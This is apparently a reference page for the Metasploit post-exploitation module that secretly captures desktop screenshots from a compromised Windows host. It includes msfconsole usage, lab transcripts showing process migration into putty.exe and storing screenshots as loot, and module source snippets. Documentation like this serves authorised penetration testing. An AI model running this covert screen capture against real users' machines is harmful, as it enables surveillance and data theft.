Windows Gather Screen Spy - Metasploit
This page contains detailed information about how to use the post/windows/gather/screen_spy metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Gather Screen Spy
Module: post/windows/gather/screen_spy
Source code: modules/post/windows/gather/screen_spy.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. Note: As of March, 2014, the VIEW_CMD option has been removed in favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but not how) the collected screenshots will be viewed from the Metasploit interface.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/screen_spy
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/screen_spy
msf post(screen_spy) > show options
... show and set options ...
msf post(screen_spy) > set SESSION session-id
msf post(screen_spy) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/screen_spy")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction.
Note: As of March, 2014, the VIEW_CMD option
has been removed in favor of the Boolean VIEW_SCREENSHOTS option,
which will control if (but not how) the collected screenshots will
be viewed from the Metasploit interface.
Verification Steps
- Start msfconsole
- Get meterpreter session
- Do:
use post/windows/gather/screen_spy - Do:
set SESSION <session id> - Do:
run
Options
RECORD
If set to true, record all screenshots to disk by saving them to loot.
PID
PID to migrate into before taking the screenshots. If no PID is specified, default to current PID.
Scenarios
Windows 10 20H2 (No Database Connected But RECORD Flag Set)
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION 1 yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[-] RECORD flag specified however the database is not connected, so no loot can be stored!
[*] Post module execution completed
Windows 10 20H2 (No Database Connected, RECORD flag not set)
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > set RECORD false
RECORD => false
msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
VIEW_SCREENSHOTS => true
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD false yes Record all screenshots to disk by saving them to loot
SESSION 2 yes The session to run this module on.
VIEW_SCREENSHOTS true no View screenshots automatically
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) >
Windows 10 20H2 (No Database Connected, RECORD flag not set, PID set to Process to Migrate To)
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > set RECORD false
RECORD => false
msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
VIEW_SCREENSHOTS => true
msf6 post(windows/gather/screen_spy) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ps -aux
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
.....
8236 1288 taskhostw.exe
8296 760 svchost.exe
8424 888 RuntimeBroker.exe x64 2 DESKTOP-KUO5CML\test C:\Windows\System32\RuntimeBroker.exe
8572 3340 MeSuAx.exe
8636 760 svchost.exe
8664 8036 putty.exe x64 2 DESKTOP-KUO5CML\test C:\Program Files\PuTTY\putty.exe
.....
meterpreter > background
[*] Backgrounding session 2...
msf6 post(windows/gather/screen_spy) > set PID 8664
PID => 8664
msf6 post(windows/gather/screen_spy) > run
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) >
Windows 10 20H2 (Database Connected, RECORD flag set)
msf6 > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION 2 yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.25.128.214 screenspy.screensho screenshot.0.jpg image/jpg Screenshot /home/gwillcox/.msf4/loot/20210412135019_d
t efault_172.25.128.214_screenspy.screen_098
612.jpg
172.25.128.214 screenspy.screensho screenshot.1.jpg image/jpg Screenshot /home/gwillcox/.msf4/loot/20210412135024_d
t efault_172.25.128.214_screenspy.screen_176
753.jpg
172.25.128.214 screenspy.screensho screenshot.2.jpg image/jpg Screenshot /home/gwillcox/.msf4/loot/20210412135029_d
t efault_172.25.128.214_screenspy.screen_057
554.jpg
172.25.128.214 screenspy.screensho screenshot.3.jpg image/jpg Screenshot /home/gwillcox/.msf4/loot/20210412135034_d
t efault_172.25.128.214_screenspy.screen_187
603.jpg
172.25.128.214 screenspy.screensho screenshot.4.jpg image/jpg Screenshot /home/gwillcox/.msf4/loot/20210412135039_d
t efault_172.25.128.214_screenspy.screen_397
543.jpg
172.25.128.214 screenspy.screensho screenshot.5.jpg image/jpg Screenshot /home/gwillcox/.msf4/loot/20210412135044_d
t efault_172.25.128.214_screenspy.screen_498
562.jpg
msf6 post(windows/gather/screen_spy) >
Go back to menu.
Msfconsole Usage
Here is how the windows/gather/screen_spy post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > show info
Name: Windows Gather Screen Spy
Module: post/windows/gather/screen_spy
Platform: Windows
Arch:
Rank: Normal
Provided by:
Roni Bachar <[email protected]>
bannedit <[email protected]>
kernelsmith <kernelsmith /x40 kernelsmith /x2E com>
Adrian Kubok
DLL_Cool_J
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
Description:
This module will incrementally take desktop screenshots from the
host. This allows for screen spying which can be useful to determine
if there is an active user on a machine, or to record the screen for
later data extraction. Note: As of March, 2014, the VIEW_CMD option
has been removed in favor of the Boolean VIEW_SCREENSHOTS option,
which will control if (but not how) the collected screenshots will
be viewed from the Metasploit interface.
Module Options
This is a complete list of options available in the windows/gather/screen_spy post exploitation module:
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/screen_spy post exploitation module:
msf6 post(windows/gather/screen_spy) > show advanced
Module advanced options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/screen_spy module can do:
msf6 post(windows/gather/screen_spy) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/screen_spy post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/screen_spy) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Unsupported Platform
- Failed to load espia extension (<E>)
- Error taking the screenshot: <E.CLASS> <E> <E.BACKTRACE>
- RECORD flag specified however the database is not connected, so no loot can be stored!
- Error storing screenshot: <E.CLASS> <E> <E.BACKTRACE>
- Error deleting the temporary screenshot file: <E.CLASS> <E> <E.BACKTRACE>
- This may be due to the file being in use if you are on a Windows platform
- Migration failed! Unable to take a screenshot under the desired process!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Unsupported Platform
Here is a relevant code snippet related to the "Unsupported Platform" error message:
61: if datastore['PID'] != ''
62: migrate
63: end
64:
65: if session.platform !~ /windows/i
66: print_error('Unsupported Platform')
67: return
68: end
69:
70: begin
71: session.core.use('espia')
Failed to load espia extension (<E>)
Here is a relevant code snippet related to the "Failed to load espia extension (<E>)" error message:
68: end
69:
70: begin
71: session.core.use('espia')
72: rescue ::Exception => e
73: print_error("Failed to load espia extension (#{e})")
74: return
75: end
76:
77: begin
78: count = datastore['COUNT']
Error taking the screenshot: <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error taking the screenshot: <E.CLASS> <E> <E.BACKTRACE>" error message:
83: count.times do |num|
84: select(nil, nil, nil, datastore['DELAY'])
85: begin
86: data = session.espia.espia_image_get_dev_screen
87: rescue Rex::Post::Meterpreter::RequestError => e
88: print_error("Error taking the screenshot: #{e.class} #{e} #{e.backtrace}")
89: return false
90: end
91: if data
92: if record?
93: if framework.db.active
RECORD flag specified however the database is not connected, so no loot can be stored!
Here is a relevant code snippet related to the "RECORD flag specified however the database is not connected, so no loot can be stored!" error message:
93: if framework.db.active
94: # let's loot it using non-clobbering filename, even tho this is the source filename, not dest
95: fn = "screenshot.%0#{leading_zeros}d.jpg" % num
96: file_locations << store_loot('screenspy.screenshot', 'image/jpg', session, data, fn, 'Screenshot')
97: else
98: print_error('RECORD flag specified however the database is not connected, so no loot can be stored!')
99: return false
100: end
101: end
102:
103: # also write to disk temporarily so we can display in browser.
Error storing screenshot: <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error storing screenshot: <E.CLASS> <E> <E.BACKTRACE>" error message:
115: screenshot_path = "file://#{screenshot}"
116: Rex::Compat.open_browser(screenshot_path)
117: end
118: end
119: rescue IOError, Errno::ENOENT => e
120: print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
121: return
122: end
123: print_status('Screen Spying Complete')
124: if record? && framework.db.active && file_locations && !file_locations.empty?
125: print_status 'run loot -t screenspy.screenshot to see file locations of your newly acquired loot'
Error deleting the temporary screenshot file: <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error deleting the temporary screenshot file: <E.CLASS> <E> <E.BACKTRACE>" error message:
130: sleep 2
131: vprint_status "Deleting temporary screenshot file: #{screenshot}"
132: begin
133: ::File.delete(screenshot)
134: rescue StandardError => e
135: print_error("Error deleting the temporary screenshot file: #{e.class} #{e} #{e.backtrace}")
136: print_error('This may be due to the file being in use if you are on a Windows platform')
137: end
138: end
139: end
140:
This may be due to the file being in use if you are on a Windows platform
Here is a relevant code snippet related to the "This may be due to the file being in use if you are on a Windows platform" error message:
131: vprint_status "Deleting temporary screenshot file: #{screenshot}"
132: begin
133: ::File.delete(screenshot)
134: rescue StandardError => e
135: print_error("Error deleting the temporary screenshot file: #{e.class} #{e} #{e.backtrace}")
136: print_error('This may be due to the file being in use if you are on a Windows platform')
137: end
138: end
139: end
140:
141: def migrate
Migration failed! Unable to take a screenshot under the desired process!
Here is a relevant code snippet related to the "Migration failed! Unable to take a screenshot under the desired process!" error message:
141: def migrate
142: begin
143: session.core.migrate(datastore['PID'].to_i)
144: print_good('Migration successful')
145: return datastore['PID']
146: rescue StandardError
147: fail_with(Failure::Unknown, 'Migration failed! Unable to take a screenshot under the desired process!')
148: return nil
149: end
150: end
151: end
Go back to menu.
Related Pull Requests
- #14994 Merged Pull Request: Updating screen_spy.rb to have a PID option for session migration
- #10165 Merged Pull Request: Fix missing RequestError in a few post modules
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2525 Merged Pull Request: Change module boilerplate
- #1412 Merged Pull Request: post/windows/gather/screenspy was kinda busted, this fixes it
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #958 Merged Pull Request: Msftidy 2
Go back to menu.
See Also
Check also the following modules related to this module:
- post/windows/gather/ad_to_sqlite
- post/windows/gather/arp_scanner
- post/windows/gather/avast_memory_dump
- post/windows/gather/bitcoin_jacker
- post/windows/gather/bitlocker_fvek
- post/windows/gather/bloodhound
- post/windows/gather/cachedump
- post/windows/gather/checkvm
- post/windows/gather/dnscache_dump
- post/windows/gather/dumplinks
- post/windows/gather/enum_ad_bitlocker
- post/windows/gather/enum_ad_computers
- post/windows/gather/enum_ad_groups
- post/windows/gather/enum_ad_managedby_groups
- post/windows/gather/enum_ad_service_principal_names
- post/windows/gather/enum_ad_to_wordlist
- post/windows/gather/enum_ad_user_comments
- post/windows/gather/enum_ad_users
- post/windows/gather/enum_applications
- post/windows/gather/enum_artifacts
- post/windows/gather/exchange
- post/windows/gather/file_from_raw_ntfs
- post/windows/gather/get_bookmarks
- post/windows/gather/hashdump
- post/windows/gather/local_admin_search_enum
- post/windows/gather/lsa_secrets
- post/windows/gather/make_csv_orgchart
- post/windows/gather/memory_dump
- post/windows/gather/memory_grep
- post/windows/gather/netlm_downgrade
- post/windows/gather/ntds_grabber
- post/windows/gather/ntds_location
- post/windows/gather/outlook
- post/windows/gather/phish_windows_credentials
- post/windows/gather/psreadline_history
- post/windows/gather/resolve_sid
- post/windows/gather/reverse_lookup
- post/windows/gather/smart_hashdump
- post/windows/gather/tcpnetstat
- post/windows/gather/usb_history
- post/windows/gather/win_privs
- post/windows/gather/wmic_command
- post/windows/gather/word_unc_injector
Authors
- Roni Bachar <roni.bachar.blog[at]gmail.com>
- bannedit
- kernelsmith <kernelsmith /x40 kernelsmith /x2E com>
- Adrian Kubok
- DLL_Cool_J
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
